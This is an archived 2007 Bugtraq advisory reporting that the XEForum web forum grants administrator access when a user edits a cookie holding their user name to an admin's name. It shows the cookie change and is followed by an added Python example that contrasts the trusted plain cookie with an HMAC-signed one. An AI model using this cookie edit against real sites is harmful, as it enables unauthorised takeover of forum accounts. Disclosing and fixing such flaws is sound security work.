Bugtraq mailing list archives
XEForum Cookie Modification Privilege Escalation Vulnerability
From: Firewall1954 () hotmail com
Date: 28 Jun 2007 01:12:55 -0000
--------------------------------------------------------------------
XEForum Cookie Modification Privilege Escalation Vulnerability
--------------------------------------------------------------------

Vulnerable product: XEForum
Vendor: http://www.xeforum.com/

Date:
--------------------
Found: Jun 26, 2007

Vulnerability:
--------------------
XEForum contains a flaw that may allow a remote attacker to gain administrative privileges.
By modifying the contained cookie you can change session and even enter as administrator.

Cookie:
-----------------------------------
: Cookie: xeforum="Your Username" :
-----------------------------------

change to:

------------------------------------
: Cookie: xeforum="Admin Username" :
------------------------------------

Credit:
--------------------
Firewall
Firewall of Peru
Firewall () hotmail com
Greetz to Swp-Scene And Revolutionz
http://4firewall.uni.cc
--------------------------------------------------------------------
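
The root cause reported above is a cookie whose value is trusted as the user's identity. The following is an added example, not part of the original post and not XEForum code: it contrasts that pattern with a cookie bound to a server-side HMAC, so a changed user name no longer verifies. All function names, the `username|tag` layout and the key handling are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

# Constructed for this example; a real deployment loads the key from protected config.
SERVER_KEY = secrets.token_bytes(32)


def identity_from_plain_cookie(cookie_value):
    """Pattern described in the advisory: the cookie value *is* the user name."""
    return cookie_value.strip('"')


def _tag(username, key):
    """Hex HMAC-SHA256 over the user name, computable only with the server key."""
    return hmac.new(key, username.encode("utf-8"), hashlib.sha256).hexdigest()


def issue_cookie(username, key=SERVER_KEY):
    """Issue 'username|tag' at login (hypothetical layout)."""
    return f"{username}|{_tag(username, key)}"


def identity_from_signed_cookie(cookie_value, key=SERVER_KEY):
    """Return the user name only if the tag matches; otherwise None."""
    # The tag is hex and never contains '|', so split on the last separator.
    username, sep, tag = cookie_value.rpartition("|")
    if not sep or not username:
        return None
    expected = _tag(username, key)
    # Compare as bytes in constant time; bytes also tolerate non-ASCII input.
    if not hmac.compare_digest(expected.encode("ascii"), tag.encode("utf-8")):
        return None
    return username


if __name__ == "__main__":
    cookie = issue_cookie("alice")  # constructed sample user
    swapped = "admin|" + cookie.rpartition("|")[2]
    print("plain cookie, edited value :", identity_from_plain_cookie('"admin"'))
    print("signed cookie, untouched   :", identity_from_signed_cookie(cookie))
    print("signed cookie, name swapped:", identity_from_signed_cookie(swapped))
```

The signed value carries no expiry; a random session identifier looked up in server-side storage is the other common fix.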